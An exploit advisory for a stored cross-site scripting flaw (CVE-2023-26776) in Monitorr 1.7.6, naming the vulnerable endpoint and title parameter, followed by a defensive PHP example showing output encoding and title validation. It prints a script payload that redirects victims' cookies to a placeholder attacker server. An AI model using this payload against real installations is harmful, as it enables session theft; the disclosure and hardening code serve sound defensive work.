Monitorr 1.7.6 Cross Site Scripting

2023.04.05
Credit: Achuth V P
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79

# Exploit Title: Monitorr v1.7.6 - Cross Site Scripting
# CVE: CVE-2023-26776
# Exploit Author: Achuth V P (retrymp3)
# Date: February 09, 2023
# Vendor Homepage: https://github.com/Monitorr/
# Software Link: https://github.com/Monitorr/Monitorr
# Tested on: Ubuntu
# Version: v1.7.6
# Exploit Description: Cross Site Scripting vulnerability found in Monitorr v.1.7.6 allows a remote attacker to execute arbitrary code via the title parameter of the post_receiver-services.php file.

An attacker can create a service configuration at <base-url>/assets/php/post_receiver-services.php with the title of the service being something like:

    <script>document.location="<your-server>?cookie="document.cookie</script>

or just:

    <script>document.cookie</script>

The title is stored with the service configuration, and the injected script tag is executed every time the home page is loaded.
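The stored-title pattern described above, next to a hardened form, as an added example that is not Monitorr's source code. The function names, the `servicetitle` class and the title character policy are hypothetical.

```php
<?php
// Added example: hypothetical handler and renderer, not Monitorr's code.

// Vulnerable pattern: the stored title is concatenated into the page as-is,
// so any markup in it is parsed by the browser on every page load.
function render_service_vulnerable(array $service): string
{
    return '<div class="servicetitle">' . $service['title'] . '</div>';
}

// Hardened: encode for the HTML context at output time, whatever was stored.
function render_service(array $service): string
{
    $title = htmlspecialchars($service['title'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="servicetitle">' . $title . '</div>';
}

// Defence in depth at write time: accept only a bounded plain-text title.
// Returns the trimmed title, or null when the value must be rejected.
function validate_title($raw): ?string
{
    if (!is_string($raw)) {
        return null;
    }
    $title = trim($raw);
    // Assumed policy: letters, digits, space and . _ - ( ), 1 to 64 characters.
    if (preg_match('/\A[\p{L}\p{N} ._\-()]{1,64}\z/u', $title) !== 1) {
        return null;
    }
    return $title;
}

// Constructed sample input: one benign title and the short payload from the advisory.
$samples = ['Plex', '<script>document.cookie</script>'];
foreach ($samples as $raw) {
    $accepted = validate_title($raw);
    printf("%-36s accepted=%s\n", $raw, $accepted === null ? 'no' : 'yes');
    // The encoded output shows the payload rendered as inert text.
    echo '  rendered: ', render_service(['title' => $raw]), "\n";
}
```

Output encoding is the control that closes the issue. The write-time check only limits what reaches storage, and does nothing for titles already saved.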

